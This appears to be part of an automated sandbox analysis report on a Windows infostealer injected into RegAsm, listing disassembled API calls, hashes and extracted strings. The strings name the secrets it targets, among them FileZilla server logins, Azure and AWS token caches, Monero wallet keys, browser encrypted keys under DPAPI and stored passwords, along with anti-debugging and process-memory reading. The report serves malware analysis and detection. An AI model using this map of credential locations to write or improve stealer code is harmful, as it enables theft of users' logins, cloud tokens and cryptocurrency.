            • Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
            • Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C
            APIs
            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
            • Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 0041B562
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
            • UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
            • TerminateProcess.KERNEL32(00000000), ref: 0041B5A5
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction ID: e298f46f0b3396334d2e2e37c4a67069ca1d3d313a6b9180192500d6cd60c5fb
            • Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction Fuzzy Hash: 2F21D678600214DFD720EF59F9D4AA97BB5FB08314F90803AE809D7261E7B46586CF9D
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0041C8DE
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction ID: 8e4dbfb736b9908720f30fe25f95c1a3b6087da1e007f902b0e4d68da9f23204
            • Opcode Fuzzy Hash: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction Fuzzy Hash: 8D9002B829111456561037719D896896D905ACC6137554861B405C4055EA9841849529
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
            APIs
            • strtok_s.MSVCRT ref: 0041015B
            • memset.MSVCRT ref: 0041051D
              • Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
              • Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3
            • strtok_s.MSVCRT ref: 004104B9
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$mallocmemsetstrncpy
            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
            • API String ID: 2676359353-555421843
            • Opcode ID: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
            • Opcode Fuzzy Hash: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
            • API String ID: 2221118986-156850865
            • Opcode ID: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
            • Opcode Fuzzy Hash: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
            • memcpy.MSVCRT(?), ref: 00405F4E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$memcpy$CrackInternet
            • String ID: "$"$------$------$------$XA$XA
            • API String ID: 4271525049-2501203334
            • Opcode ID: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
            • Opcode Fuzzy Hash: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A
            • API String ID: 0-3461493422
            • Opcode ID: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction ID: eff374fbcd62c6e18ab1f1aaab25817c9043c0eeef42efb3c17498ac9b2729e3
            • Opcode Fuzzy Hash: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction Fuzzy Hash: 93A18FB1A00218ABCB34DFA4DC85FEE7379BF48305F448589E50D96181EB789B89CF65
            APIs
            • strlen.MSVCRT ref: 004169BF
            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00416C3A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004169ED
              • Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
              • Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5
            • VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00416C3A), ref: 00416B53
              • Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strlen$MemoryProcessQueryReadVirtual
            • String ID: :lA$@
            • API String ID: 2950663791-2855229504
            • Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction ID: 51c9d4b078fe92f83ab81220ebbaf7cdf2a8f9ee762561721c09ea6573e6fdbd
            • Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction Fuzzy Hash: 845108B5E04119ABDB04CF94D981AEFB7B5FF88304F108519F915A7240D738EA51CBA9
            APIs
            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00416B7E
            • OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
            • memset.MSVCRT ref: 00416C0A
            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00416D5E
            Strings
            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: OpenProcessmemset
            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
            • API String ID: 1606381396-4138519520
            • Opcode ID: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
            • Opcode Fuzzy Hash: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
            • API String ID: 2221118986-218353709
            • Opcode ID: 917d05209e3c6e9ca6065a0a923e579d9e5d238dbdb3523c9004ab1032494658
            • Instruction ID: b5eb1e2d9a8a1e3cf56e2c34e54d9e93e9a372b4459d7a8870c797c8d4c08f80
            • Opcode Fuzzy Hash: 917d05209e3c6e9ca6065a0a923e579d9e5d238dbdb3523c9004ab1032494658
            • Instruction Fuzzy Hash: AB5184B1D501186BCB14EB61DC96FED733CAF50314F4041ADB60A62092EE785BD9CBAA
            APIs
              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 004063D5
              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • strtok.MSVCRT(00000000,?), ref: 00414E7E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: HttpInternetOpenRequest$ConnectSendstrtok
            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
            • API String ID: 1208788097-1526165396
            • Opcode ID: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
            • Opcode Fuzzy Hash: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A
            APIs
            • __lock.LIBCMT ref: 0041AD5A
              • Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
              • Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
              • Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041A9A6
            • DecodePointer.KERNEL32(0042A0C8,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADA7
              • Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7
            • DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADCD
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADE0
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADEA
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
            • String ID:
            • API String ID: 2005412495-0
            • Opcode ID: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
            • Instruction ID: 26cd67dfac1a625c080c990f5aa3a4e8d575379cc8cf2dcf3c78269be391da57
            • Opcode Fuzzy Hash: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
            • Instruction Fuzzy Hash: CB3129B09423498FDF109FA9D9452DEBBF1BF48314F14402BD410A6251DBBC48A5CF6E
            APIs
            • __getptd.LIBCMT ref: 0041C3D9
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __amsg_exit.LIBCMT ref: 0041C3F9
            • __lock.LIBCMT ref: 0041C409
            • InterlockedDecrement.KERNEL32(?), ref: 0041C426
            • free.MSVCRT ref: 0041C439
            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
            • String ID:
            • API String ID: 634100517-0
            • Opcode ID: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
            • Instruction ID: 347e950a9de730bb6983817e76a39e35d30df20f4a69820d490e6e24dcd4e02e
            • Opcode Fuzzy Hash: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
            • Instruction Fuzzy Hash: 7D010431A826219BD720AB669C857EEB760BB04714F41811BE94463391CB3C68D2CFDE
            APIs
            • __getptd.LIBCMT ref: 0041C13D
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __getptd.LIBCMT ref: 0041C154
            • __amsg_exit.LIBCMT ref: 0041C162
            • __lock.LIBCMT ref: 0041C172
            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C186
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
            • Instruction ID: 8423f9a113a1835f1d35103eff65ed0838148ed172a20d49ff88b4dc443596f5
            • Opcode Fuzzy Hash: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
            • Instruction Fuzzy Hash: 9EF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv
            • String ID: %d MB$@
            • API String ID: 3732870572-3474575989
            • Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
            • Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemset
            • String ID: @$v10
            • API String ID: 1065087418-24753345
            • Opcode ID: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
            • Opcode Fuzzy Hash: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99
            APIs
            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409DE2
              • Part of subcall function 00409BB0: memcpy.MSVCRT(?,?,?), ref: 00409C16
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemcpy
            • String ID: $"encrypted_key":"$DPAPI
            • API String ID: 1784268899-738592651
            • Opcode ID: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
            • Opcode Fuzzy Hash: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5
            APIs
            • memset.MSVCRT ref: 00407354
            • task.LIBCPMTD ref: 00407595
              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memsettaskvsprintf_s
            • String ID: Password
            • API String ID: 2675463923-3434357891
            • Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
            • Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95